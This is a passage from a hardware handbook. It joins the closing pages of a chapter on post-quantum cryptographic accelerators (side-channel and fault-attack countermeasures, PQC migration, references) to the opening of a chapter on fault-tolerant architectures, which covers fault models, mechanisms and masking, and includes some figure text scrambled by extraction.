requiring matrix-vector computations. Moreover, the number of parallel multipliers
used in a design determines the area-throughput trade-off for various applications
ranging from lightweight to high-speed networks.
has 8 LUTs per Slice as compared to Spartan-6 (S-6) and Kintex-7 (K-7)
radix-2 butterfly units, took 3.72 μs (Du et al. 2016). In one of the recent
work Feng et al. (2020), a fully parallel multi-lane radix-2 NTT algorithm
based on the Stockham NTT for n = 256 achieved 0.94 μs for just a polynomial
multiplication, whereas a pipelined NTT architecture reported in Chen et al.
(2020) and Huang et al. (2020), targeting the M-LWE scheme, i.e. CRYSTALS-
Kyber with matrix_dimension l = 2, attained 52.92 and 11.8 μs, respectively, for
the polynomial multiplication part only.
Timing Attacks
• Hiding de-correlates the data processed by the device and its power foot print.
One way of doing that is ensuing constant power consumption, or to shuffle
up the order of instructions execution as undertaken in Roy et al. (2014). For
ASICs or FPGA based implementation, noise generation on device is easily done,
making the attackers job hard to read power traces for attacks.
• Masking is a provable countermeasure in which the sensitive variable is pro-
cessed in several equal shares, and each portion is individually computed so
that the attacker cannot steal the secret value unless all the shares are known.
First order masking splits the secret value into two shares. First order masking
on R-LWE-based schemes leads to lowered performance and security (Reparaz
et al. 2015; Oder et al. 2018). In Reparaz et al. (2015) first order masking is
applied on the secret key and the decoder, delaying decoding up to 16 times
and increasing the decryption error probability by 19%. Oder et al. (2018)
presented a masked CCA-secure R-LWE scheme with masked binomial sampler
and a masked encoder; Table 7 shows its performance on an ARM Cortex-M4
microcontroller. With major overhead (71%) coming from binomial sampling,
the overall performance overhead factor of the masking scheme is 5.7×.
Fault Attacks
For a fault attack the adversary purposely induces a fault and exploits the erroneous
behaviour of the circuit to gain information about the secret values in the cryp-
tosystem. A simplistic remedy is the concurrent error detection (CED), generally
undertaken via duplication of hardware or re-computation on the same hardware,
making it resource expensive or having lowered performance, respectively.
Numerous results have been reported in the context of fault attacks and coun-
termeasures on lattice based signatures: Bindel et al. (2016) investigated multiple
lattice-based signature schemes including BLISS, ring-TESLA and GLP signatures
for randomisation, skipping and zeroing faults and found several vulnerabilities
in all of them. Ravi et al. (2019) presented a first order skipping fault attack
• Most PQC schemes have larger key/signature sizes rendering larger associated
memory footprints/stack usages. This may prohibit the PQC schemes to be
used as a drop-in replacement of the currently used algorithms. Most of the
widely used protocols like X.509, IKE, TLS, SSH, etc. are designed with the
Cryptographic Agility in mind, i.e. have the ability to accommodate larger
key/signature size extensions. Protocols lacking this ability may require funda-
mental changes in the messaging and data structure to withstand the quantum
threats. Additionally, a larger transmission bandwidth is also required for PQC
schemes.
270 A. Khalid and D.-S. Kundi
In the context of PQC migration, the use of Hybrid approaches employing both
the Quantum-safe and classical public-key algorithms are advocated. IETF draft
(Stebila 2020) and technical reports (Crockett et al. 2019; Xu et al. 2020) provide
the “Framework” to integrate the PQC with the current ECC/RSA into TLS, SSH
protocols to provide potentially secure KEM/KEP. This hybrid approach will help
maintain the inter-operability during the migration.
In addition to above, the term Hybrid approach is also used to combine the
Quantum and non-quantum schemes. Here, the Quantum scheme refers to the
Quantum key distribution (QKD) that is based on Quantum mechanics. It enables
Alice and Bob to generate shared symmetric keys securely where the source of
security underpinned comes from the communication of quantum light signals.
The non-quantum schemes refer to the post-quantum cryptography (PQC) schemes
that run on today’s (classical) computing devices and are based on mathematical
techniques immune to Shor’s algorithm attack and hence are deemed resistant to
other quantum algorithms that may be developed in the future. A combination of
PQC and QKD provides a solution very appealing in terms of security. If Alice
and Bob seed a QKD session with new, asymmetric PQC, the quantum keys they
establish will remain secure even if there are catastrophic failures due to advances
in quantum computing, implementation vulnerabilities or evolving classical security
failures (Dowling et al. 2020).
Conclusions
References
Ajtai M (1996) Generating hard instances of lattice problems. In: Proceedings of 28th annual ACM
symposium on theory of computing, pp 99–108
Ajtai (1998) Worst-case complexity, worst-case complexity and lattice problems. Doc Math J DMV
III ICM:421–428
Ajtai M, Dwork C (1997) A public-key cryptosystem with worst-case/average-case equivalence
In: Proceedings of the twenty-ninth annual ACM symposium on Theory of computing (STOC
’97).Association for Computing Machinery. New York, pp 284–293. https://doi.org/10.1145/
258533.258604
Alkim E, Bindel N, Buchmann JA, Dagdelen Ö, Schwabe P (2015) Tesla: tightly-secure efficient
signatures from standard lattices. IACR Cryptology ePrint Archive, vol 2015, p 755
Aydin A, Cameron P, Patrick S (2013) Low-cost and area-efficient FPGA implementations
of lattice-based cryptography. In: 2013 IEEE international symposium on hardware-oriented
security and trust (HOST), pp 81–86
Banerjee U, Ukyab TS, Chandrakasan AP (2019) Sapphire: a configurable crypto-processor for
post-quantum lattice-based protocols. IACR Trans Cryptogr Hardw Embed Syst 2019:17–61
Barker W, Polk W, Souppaya M (2021a) Getting ready for post-quantum cryptography: exploring
challenges associated with adopting and using post-quantum cryptographic algorithms, NIST
Cybersecurity White Paper, p 10. [Online]. Available: https://doi.org/10.6028/NIST.CSWP.
04282021
Barker W, Consulting D, Souppaya M (2021b) Migration to post-quantum crytpography, NCCoE
Draft Project. [Online]. Available: https://www.nccoe.nist.gov/sites/default/files/library/project-
descriptions/pqc-migration-project-description-draft.pdf
Barrett P (1986) Implementing the Rivest Shamir and Adleman public key encryption algorithm
on a standard digital signal processor. In: Advances in cryptology – CRYPTO’86. Proceedings,
Santa Barbara. Springer, Berlin/Heidelberg, pp 311–323. [Online]. Available: https://doi.org/
10.1007/3-540-47721-7_24
Basu K, Soni D, Nabeel M, Karri R (2019) A resource-efficient and side-channel secure hardware
implementation of Ring-LWE cryptographic processor. In: NIST post-quantum cryptography –
a hardware evaluation study. Cryptology ePrint Archive, vol 2019. [Online]. Available: https://
eprint.iacr.org/2019/047
Bindel N, Buchmann J, Krämer J (2016) Lattice-based signature schemes and their sensitivity
to fault attacks. In: 2016 workshop on fault diagnosis and tolerance in cryptography (FDTC).
IEEE, pp 63–77
Blum A, Furst M, Kearns M, Lipton RJ (1994) Cryptographic primitives based on hard learning
problems. In: Stinson DR (ed) Advances in cryptology – CRYPTO’93. Springer, Berlin/Hei-
delberg, pp 278–291
Bos J, Ducas L, Kiltz E, Lepoint T, Lyubashevsky V, Schanckk JM, Schwabe P, Seile G, Stehl D
(2019) CRYSTALS-Kyber: a CCA-secure module-lattice-based kem. Technical report, National
Institute of Standards and Technology. [Online]. Available: https://pq-crystals.org/kyber/data/
kyber-specification-round2.pdf
Braithwaite M (2005) Experimenting with post-quantum cryptography. https://security.googleblog.
com/2016/07/experimenting-with-post-quantum.html
Buchmann J, Dahmen E, Hülsing A (2011) XMSS-a practical forward secure signature scheme
based on minimal security assumptions. In: International workshop on post-quantum cryptog-
raphy. Springer, pp 117–129
Buchmann JA, Cabarcas D, Göpfert F, Hülsing A, Weiden P (2013) Discrete ziggurat: a time-
memory trade-off for sampling from a Gaussian distribution over the integers. In: SAC 2013,
pp 402–417. [Online]. Available: https://doi.org/10.1007/978-3-662-43414-7_20
Chen Z, Ma Y, Chen T, Lin J, Jing J (2020) Towards efficient Kyber on FPGAs: a processor for
vector of polynomials. In: 25th Asia and South Pacific design automation conference (ASP-
DAC), pp 247–252
272 A. Khalid and D.-S. Kundi
Cooley JW, Tukey JW (1965) An algorithm for the machine calculation of complex fourier series.
Math Comput 19:297–301
Crockett E, Paquin C, Stebila D (2019) Prototyping post-quantum and hybrid key exchange and
authentication in TLS and SSH. Cryptology ePrint Archive, Report 2019/858. https://eprint.iacr.
org/2019/858
Dang VB, Farahmand F, Andrzejczak M, Gaj K (2019) Implementing and benchmarking three
lattice-based post-quantum cryptography algorithms using software/hardware co-design. In:
2019 international conference on field-programmable technology (ICFPT), pp 206–214
Daniele M (2001) The hardness of the closest vector problem with preprocessing. IEEE Trans Inf
Theory 47(3):1212–1215
Daniele M, Oded R (2009) Lattice-based cryptography. In: Bernstein D, Buchmann J (eds) Post-
quantum cryptography. Springer, Berlin/Heidelberg
Ding J, Petzoldt A (2017) Current state of multivariate cryptography. IEEE Secur Priv 15(4):28–36
Dowling B, Hansen TB, Paterson KG (2020) Many a mickle makes a muckle: a framework for
provably quantum-secure hybrid key exchange. In: International conference on post-quantum
cryptography. Springer, pp 483–502
Ducas L (2014) Accelerating BLISS: the geometry of ternary polynomials. IACR cryptology ePrint
archive, vol 2014, p 874. [Online]. Available: http://eprint.iacr.org/2014/874
Ducas L, Durmus A, Lepoint T, Lyubashevsky V (2013) Lattice signatures and bimodal Gaussians.
In: Proceedings of annual cryptology conference – CRYPTO 2013. Springer, Berlin/Heidel-
berg, pp 40–56
Du C, Bai G, Wu X (2016) High-speed polynomial multiplier architecture for ring-lwe based public
key cryptosystems. In: 2016 international Great Lakes symposium on VLSI (GLSVLSI). IEEE,
pp 9–14
Du C, Bai G (2015) Towards efficient discrete Gaussian sampling for lattice-based cryptography.
In: 2015 25th international conference on field programmable logic and applications (FPL).
IEEE, pp 1–6
Dwarakanath NC, Galbraith SD (2014) Sampling from discrete Gaussians for lattice-based
cryptography on a constrained device. Appl Algebra Eng Commun Comput 25:159–180
Eisenbarth T, Kumar S, Paar C, Poschmann A, Uhsadel L (2007) A survey of lightweight-
cryptography implementations. IEEE Des Test Comput 24(6):522–533
Fan S, Liu W, Howe J, Khalid A, O’Neill M (2018) Lightweight hardware implementation of R-
LWE lattice-based cryptography. In: Proceedings of IEEE Asia Pacific conference on circuits
and systems (APCCAS), pp 403–406
Feng X, Li S, Xu S (2020) R-LWE-oriented high-speed polynomial multiplier utilizing multi-lane
stockham ntt algorithm. IEEE Trans Circuits Syst II: Express Briefs 67:556–559
Fritzmann T, Sepúlveda J (2019) Efficient and flexible low-power ntt for lattice-based cryptogra-
phy. In: 2019 IEEE international symposium on hardware oriented security and trust (HOST).
IEEE, pp 141–150
Fritzmann T, Sharif U, Müller-Gritschneder D, Reinbrecht C, Schlichtmann U, Sepulveda J (2019)
Towards reliable and secure post-quantum coprocessors based on RISC-V. In: 2019 design,
automation test in Europe conference exhibition (DATE), pp 1148–1153
Grover LK (1996) A fast quantum mechanical algorithm for database search. In: Proceedings of
28th annual ACM symposium on theory of computing. STOC’96. ACM, New York, pp 212–
219. [Online]. Available: https://doi.org/10.1145/237814.237866
Güneysu T, Krausz M, Oder T, Speith J (2018) Evaluation of lattice-based signature schemes in
embedded systems. In: 25th IEEE international conference on electronics, circuits and systems
(ICECS). IEEE, pp 385–388
Hoffstein J, Pipher J, Silverman JH (1998) NTRU: a ring-based public key cryptosystem. In:
Algorithmic number theory. Springer, Berlin/London, pp 267–288
Howe J, Khalid A, Rafferty C, Regazzoni F, O’Neill M (2016) On practical discrete Gaussian
samplers for lattice-based cryptography. IEEE Trans Comput 67(3):322–334
Howe J, Khalid A, Rafferty C, Regazzoni F, O’Neill M (2018) On practical discrete Gaussian
samplers for lattice-based cryptography. IEEE Trans Comput 67(3):322–334
8 Post-Quantum Cryptographic Accelerators 273
McEliece RJ (1978) A public-key cryptosystem based on algebraic. In: Coding Thv, vol 4244,
pp 114–116
McKay K, Bassham L, Sönmez Turan M, Mouha N (2016) Report on lightweight cryptography.
National Institute of Standards and Technology, Technical Report
Merkle RC (1989) A certified digital signature. In: Conference on the theory and application of
cryptology. Springer, pp 218–238
Micciancio D, Walter M (2017) Gaussian sampling over the integers: efficient, generic, constant-
time. In: Annual international cryptology conference. Springer, pp 455–485
Microsoft (2020) SHA-1 windows content to be retired August 3, 2020, Windows IT Pro
Blog. [Online]. Available: https://techcommunity.microsoft.com/t5/windows-it-pro-blog/sha-
1-windows-content-to-be-retired-august-3-2020/ba-p/1544373
Moody D (2016) Post-quantum cryptography: NIST’s plan for the future. In: Talk given at
PQCrypto 16 conference, Fukuoka. [Online]. Available: https://pqcrypto2016.jp/data/pqc2016_
nist_announcement.pdf
Nejatollahi H, Dutt ND, Banerjee I, Cammarota R (2018) Domain-specific accelerators for ideal
lattice-based public key protocols. IACR Cryptol. ePrint Archive, vol 2018, p 608
Niederreiter H, Xing C (2009) Algebraic geometry in coding theory and cryptography. Princeton
University Press, Princeton
NIST (2019) Status report on the first round of the NIST Post-Quantum Cryptography Standardiza-
tion Process. [Online]. Available: https://nvlpubs.nist.gov/nistpubs/ir/2019/NIST.IR.8240.pdf
NIST (2020) Status report on the second round of the NIST Post-Quantum Cryptography Standard-
ization Process. [Online]. Available: https://csrc.nist.gov/publications/detail/nistir/8309/final
Nussbaumer HJ (1981) The fast fourier transform. In: Fast fourier transform and convolution
algorithms. Springer, Berlin/Heidelberg/New York pp 80–111
Oder T, Pöppelmann T, Güneysu T (2014) Beyond ECDSA and RSA: lattice-based digital signa-
tures on constrained devices. In: 2014 51st ACM/EDAC/IEEE design automation conference
(DAC). IEEE, pp 1–6
Oder T, Güneysu T, Valencia F, Khalid A, O’Neill M, Regazzoni F (2016) Lattice-based
cryptography: from reconfigurable hardware to ASIC. In: 2016 international symposium on
integrated circuits (ISIC). IEEE, pp 1–4
Oder T, Schneider T, Pöppelmann T, Güneysu T (2018) Practical CCA2-secure and masked ring-
LWE implementation. IACR Trans Cryptogr Hardw Embed Syst 2018:142–174
Oder T, Speith J, Höltgen K, Güneysu T (2019) Towards practical microcontroller implementation
of the signature scheme Falcon. In: International conference on post quantum cryptography.
Springer, pp 1–17
Peikert C (2010) An efficient and parallel Gaussian sampler for lattices. In: International cryptool-
ogy conference – CRYPTO 2010. CRYPTO’10, Santa Barbara. Springer, Berlin/Heidelberg
Peikert C (2020) He gives C-sieves on the CSIDH. In: Annual international conference on the
theory and applications of cryptographic techniques. Springer, pp 463–492
Pessl P (2016) Analyzing the shuffling side-channel countermeasure for lattice-based signatures.
In: International conference on cryptology in India. Springer, pp 153–170
Pöppelmann T, Güneysu T (2013) Towards practical lattice-based public-key encryption on
reconfigurable hardware. In: Proceedings of international conference on selected areas in
cryptography, pp 68–85
Pöppelmann T, Güneysu T (2014) Area optimization of lightweight lattice-based encryption on
reconfigurable hardware. In: Proceedings of IEEE international symposium on circuits and
systems (ISCAS), pp 2796–2799
Pöppelmann T, Ducas L, Güneysu T (2014) Enhanced lattice-based signatures on reconfigurable
hardware. In: International workshop on cryptographic hardware and embedded systems.
Springer, pp 353–370
PQM4 (2018) Post-quantum cryptography on ARM Cortex-M4 family of microcontrollers.
[Online]. Available: https://github.com/mupq/pqm4
Ravi P, Jhanwar MP, Howe J, Chattopadhyay A, Bhasin S (2019) Exploiting determinism in
lattice-based signatures: practical fault attacks on pqm4 implementations of nist candidates.
In: Proceedings of the 2019 ACM Asia conference on computer and communications security,
pp 427–440
8 Post-Quantum Cryptographic Accelerators 275
Regev O (2005) On lattices, learning with errors, random linear codes, and cryptography. In:
Proceedings of 37th annual ACM symposium on theory of computing (STOC), pp 84–93
Regev O (2010) The learning with errors problem (invited survey). In: Proceedings of of 25th
annual IEEE conference on computational complexity, CCC 2010, Cambridge, MA, pp 191–
204
Rentería-Mejía CP, Velasco-Medina J (2017) High-throughput Ring-LWE cryptoprocessors. IEEE
Trans VLSI Syst 25:2332–2345
Reparaz O, Roy SS, Vercauteren F, Verbauwhede I (2015) A masked ring-lwe implementation. In:
International workshop on cryptographic hardware and embedded systems. Springer, pp 683–
702
Roy SS, Basso A (2020) High-speed instruction-set coprocessor for lattice-based key encapsulation
mechanism: saber in hardware. In: TCHES, vol 4
Roy SS, Vercauteren F, Verbauwhede I (2013) High precision discrete Gaussian sampling on
FPGAs. In: International conference on selected areas in cryptography. Springer, pp 383–
401
Roy SS, Vercauteren F, Mentens N, Chen DD, Verbauwhede I (2014) Compact Ring-LWE
cryptoprocessor. In: Proceedings of international workshop on cryptographic hardware and
embedded systems, pp 371–391
Roy SS, Reparaz O, Vercauteren F, Verbauwhede I (2014) Compact and side channel secure
discrete Gaussian sampling. ePrint Report 2014/591. https://eprint.iacr.org/2014/591
Roy SS, Reparaz O, Vercauteren F, Verbauwhede I (2014) Compact and side channel secure
discrete gaussian sampling. In: IACR Cryptology ePrint Archive vol 2014, p 591
Saarinen M-JO (2015) Gaussian sampling precision in lattice cryptography. Technical Report 953.
[Online]. Available: https://eprint.iacr.org/2015/953
Schneier B (2005) Cryptanalysis of SHA-1, Schneier on Security. [Online]. Available: https://
www.schneier.com/blog/archives/2005/02/cryptanalysis_o.html
Shor PW (1994) Algorithms for quantum computation: discrete logarithms and factoring. In:
Proceedings of 35th annual symposium on foundations of computer science, pp 124–134
Song S, Tang W, Chen T, Zhang Z (2018) LEIA: a 2.05 mm 2 140 mw lattice encryption instruction
accelerator in 40 nm CMOS. In: 2018 IEEE custom integrated circuits conference (CICC).
IEEE, pp 1–4
Standards EWC (2015) Quantum safe cryptography and security: an introduction, benefits,
enablers and challenges, White Paper No. 8
Stebila D (2020) Hybrid key exchange in TLS 1.3, Internet Engineering Task Force (IETF) draft
Steffen A, Willi M, Brunner T (2005) Strongswan IPSec project. http://www.strongswan.org
Takashima K, Takayasu A (2015) Tighter security for efficient lattice cryptography via the Renyi
divergence of optimized orders. In: Au M-H, Miyaji A (eds) Provable security. Lecture notes in
computer science. Springer International Publishing, pp 412–431. [Online]. Available: https://
doi.org/10.1007/978-3-319-26059-4_23
UM0586 (2018) STM32 cryptographic library. [Online]. Available: https://www.st.com/resource/
en/user_manual/cd00208802.pdf
Valencia F, Khalid A, O’Sullivan E, Regazzoni F (2017) The design space of the number theoretic
transform: a survey. In: Proceedings of international conference on embedded computer
systems: architectures, modeling, and simulation (SAMOS), pp 273–277
Wieschebrink C (2006) Two NP-complete problems in coding theory with an application in code
based cryptography. In: Proceedings of IEEE international symposium on information theory.
IEEE, pp 1733–1737
Xu J, Gao Y, Lim H (2020) Practical quantum-safe stateful hybrid key exchange protocol.
Cryptology ePrint Archive, Report 2020/763. https://eprint.iacr.org/2020/763
Yao K, Kundi D-S, Wang C, O’Neill M, Liu W (2021) Towards CRYSTALS-Kyber: a M-LWE
cryptoprocessor with area-time trade-off. In: Proceedings of IEEE international symposium on
circuits and systems (ISCAS), pp 1–5
Zhang Y, Wang C, Kundi D-S, Khalid A, O’Neill M, Liu W (2020) An efficient and parallel R-
LWE cryptoprocessor. IEEE Trans Circuits Syst II: Express Briefs 67(5):886–890
Fault Tolerant Architectures
9
Siva Satyendra Sahoo, Anup Das, and Akash Kumar
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 278
Faults, Errors, and Failures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 281
Fault Model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 281
Fault Mechanisms . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 282
Fault Masking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 284
Reliability . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 286
Fault Tolerance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 289
Fault Tolerance Activities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 290
Redundancy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 291
Fault-Tolerant Computation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 294
Single-Core Computing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 294
Multicore Computing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 296
Reconfigurable Computing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 297
Fault-Tolerant Memory/Storage . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 298
Cache/On-chip SRAM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 299
Main Memory/DRAM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 299
Storage . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 299
Fault-Tolerant On-Chip Communication . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 300
Cross-Layer Reliability . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 301
Domain-Specific Fault Tolerance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 303
Fault Tolerance in Emerging Technologies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 304
Emerging Memory Technologies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 304
Reliability Issues in NVMs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 306
Fault Tolerance in AI/ML . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 309
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 314
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 316
Abstract
Keywords
Introduction
107 Transistors
6 (thousands)
10
10
5 Single-Thread
Performance
(SpecINT x 103)
104
Frequency (MHz)
103
Typical Power
102 (Watts)
Number of
101 Logical Cores
100
Present/
Projected
Past
of typical electronic systems’ life cycle, namely, infant mortality, primarily caused
by premature failure of weak components as a result of manufacturing defects and
burn-in testing and constant failures due to random faults and the wearout-based
faults due to aging. The solid curve in the figure shows the net effect of all three
factors. With aggressive technology scaling, the rate of manufacturing defects has
increased, resulting in higher infant mortality and higher susceptibility to aging-
related faults. As mentioned earlier, the higher soft error rate results in increasing
constant failure rate due to random faults. Further, the increasing power density
due to higher clock speeds and parallel processing (in multicore systems) results in
accelerated aging. The net result of all these factors is the increased failure rate as
shown by the dashed bathtub curve in the figure.
The effect of increasing faults can be observed across all types of architecture
components – computation, communication and storage – resulting in the degrada-
tion of different Quality of Service (QoS) metrics of an application. If unmasked,
soft errors in memory elements and interconnects result in reduced functional
reliability. Similarly, degradation in interconnects and logic elements may lead
to slower components leading to reduced timing reliability. Lifetime reliability of
electronic systems is adversely affected by both aging and permanent faults of the
components.
Redundancy has been the primary approach for achieving fault tolerance across
the computation stack. It usually involves replicating execution across (1) multiple
components (spatial), (2) a single component (temporal), and (3) additional data
(information) to detect and/or mask faults. The implementation cost and efficacy of
each type of redundancy may vary for different applications, and given the system’s
constraints, a subset of such methods may prove to be infeasible for the application.
Further, depending upon the application domain, a system may prioritize one/more
among functional, timing, and lifetime reliability. For instance, in real-time systems,
the timeliness of execution has the highest priority. Similarly, in financial and
scientific computations, the accuracy of calculations would be more important than
the execution time. Additionally, in systems such as consumer products and space
missions, extended lifetime of the system may have higher priority. Also, in a system
executing multiple applications, each application may have varying criticality w.r.t.
each reliability-related performance metric. In this scenario, a uniform approach to
fault tolerance can result in under-/overdesign. Therefore designing fault-tolerant
architectures forms an important aspect of application-specific computing.
This chapter briefly covers the various aspects of fault-tolerant architectures
– background, taxonomy, methods, and the state of the art. The rest of the
chapter is organized as follows. Section “Faults, Errors, and Failures” provides a
brief overview of the fault mechanisms followed by a description of the relevant
nomenclature and taxonomy. Section “Fault Tolerance” covers the generic meth-
ods and methodologies involved in fault tolerance. More specific approaches to
fault-tolerant designs for computation, memory/storage, and communication are
presented in sections “Fault-Tolerant Computation”, “Fault-Tolerant Memory/Stor-
age”, and “Fault-Tolerant On-Chip Communication”, respectively. Sections “Fault
Tolerance in Emerging Technologies” and “Cross-Layer Reliability” present more
recent advancements in fault-tolerant architecture w.r.t. emerging technologies
9 Fault Tolerant Architectures 281
Fault Model
The events in a system related to fault tolerance can be classified as one of failure,
error, and fault (Avizienis et al. 2004). An application failure refers to an event
where the service delivered by the system deviates from the expected service defined
by the application requirements. An error refers to the deviation of the system
from a correct service state to an erroneous one. Faults refer to the adjudged
or hypothesized cause of the error. The faults in any computing system may be
caused by either physical faults affecting the hardware or due to imperfect software
implementation. For the current chapter, we limit the discussion to physical faults
only. A major classification of faults is based on the frequency and persistence of
the occurrence of the faults:
• Transient Faults occur at a particular time, remain in the system for some period,
and then disappear. Such faults are initially dormant but can become active at any
time. Examples of such faults occur in hardware components that have an adverse
reaction to some external interference, such as electrical fields or radioactivity.
• Intermittent Faults show up in systems from time to time due to some inherent
design issue or aging. An example is a hardware component that is heat-sensitive
– it works for some time, stops working, cools down, and then may start to work
normally again.
• Permanent Faults such as a broken wire or a software design error show a more
persistent behavior than intermittent faults – start at a particular time and remain
in the system until they are repaired.
While the above classification is based on the cause of the physical faults,
different fault models are used for investigating the effect of such faults at higher
abstractions. Such fault models include:
• Stuck-at fault: This is used to model the effect when a memory cell or the
input/output of a logic gate is permanently fixed to a single logic value – stuck-
at-zero or stuck-at-one.
• Single bit-flip fault: This is used to model the transition from one logic value to
another. Such a model can also be used to represent an instance of a bit flip, for
example, as a result of fault injection, or a bit flip within a time window, where
the original logic value is restored after the fault duration.
• Multiple bit-flip fault: This is used to model the logic transition (due to a fault)
across multiple bits. One of the primary use-cases for such models includes
representing faults due to coupling – electric shorts and electromagnetic.
282 S. S. Sahoo et al.
Fault Mechanisms
Several fault mechanisms are responsible for causing one or more of the above types
of faults. The mechanisms of physical faults can be broadly categorized as discussed
below.
External Faults
Investigation into external factors, primarily cosmic radiations, causing anomalous
behavior in digital circuits have been reported since 1975 (Binder et al. 1975).
Such factors can result in both transient and permanent faults. Transient faults can
lead to soft errors which usually refer to non-reproducible hardware malfunctions.
The additional charge induced by external interference (such as alpha particles
from radioactive impurities in chip packaging materials and neutrons generated by
cosmic radiation’s interaction with the earth’s atmosphere) can sometimes lead to
changing the logic value. As shown in Fig. 3, the interaction of these particles and
the silicon lattice, on striking the IC, produces a collected charge which might be
sufficient – greater than the critical charge, Qcrit – to change the logical value of
the impacted node. While in memory elements, the changed value is retained until
the next refresh; in combinational circuits the computations are affected only if the
wrong value is latched by a memory element.
Permanent faults can be caused by radiation effects such as Single Event Latchup
(SEL) and Total Ionizing Dose (TID) that the device is exposed to. SEL refers
the phenomenon when the passage of a single particle induces the creation of
parasitic bipolar (p-n-p-n) shorting of power to ground. TID refers to the cumulative
long term ionizing damage due to protons and electrons and can cause devices
to suffer threshold shifts, increased device leakage, power consumption, timing
changes, decreased functionality, etc. Although the voltage scaling has reduced the
probability of occurrence of SELs, the reduced feature size in advanced technology
nodes and the resulting manufacturing defects have increased the vulnerability to
TID (Arzt et al. 1992).
charged particle
n+ n+ n+ p+
n-well
p-substrate
Aging/Stress-Induced Faults
The term aging broadly refers to the degradation of semiconductor devices due to
continued electrical stress that may lead to timing failures and reduced operational
life of the IC. The primary physical phenomena causing aging are shown in Fig. 4
and are listed next:
a b
Dielectric
Dielectric Breakdown
path
- --
- - - - --- -- -
-
- - - - - - - -
n+ n+ n+ n+
c
High-k dielectric
- -
- - - -
-
- - - n+ n+
n+ - - n+
Fig. 4 Aging-related fault mechanisms. (a) HCI in NMOS. (b) TDDB in NMOS. (c) Positive bias
temperature instability (PBTI). (d) Open and short circuit faults due to electromigration. (Source:
W.D. Nix et al. 1992)
284 S. S. Sahoo et al.
Fault Masking
The fault mechanisms discussed above can result in bit flips in memory and/or in
some logic node. However, not all faults may lead to errors or failures. Faults can
eventually lead to application failure only if they are not masked at any stage. The
9 Fault Tolerant Architectures 285
masking of faults (and errors) can be attributed to one or more of the following
phenomena.
The fault masking described above refers to more implicit phenomenon that may
occur in a system. Additional fault mitigation methods are usually implemented
at multiple abstractions for improving the fault tolerance of the system. Given
the implicit fault masking and fault mitigation methods, Fig. 6 shows the different
scenarios that can occur as a result of a hardware fault. As seen in the figure, an error
occurs in the system only when a wrong logic value is either read from a storage bit
or latched from a gate output and not mitigated by any error protection mechanisms.
Similarly, an application failure occurs only when the error is not masked by the
application logic and the resulting deviation is beyond the application’s tolerance
limits. Estimation of the error and failure probabilities of a system are covered in
section “Reliability Estimation.”
(a) (b)
Fig. 5 Fault Masking: (a) Logical masking in half-adder combinational circuit. (b) Reduced
latching-window masking due to faster clocks
286 S. S. Sahoo et al.
Reliability
Types of Reliability
As shown in Fig. 6, an application’s failure rate is correlated to the application-
specific tolerance to errors and resulting deviation in application behavior. The
type and extent of such tolerances may vary with the application domain and are
characterized by application-specific QoS requirements. The fault tolerance specific
QoS metrics (some of which are shown in Fig. 7) can be categorized as follows:
• Functional Reliability: With the rising constant failure rates during the normal
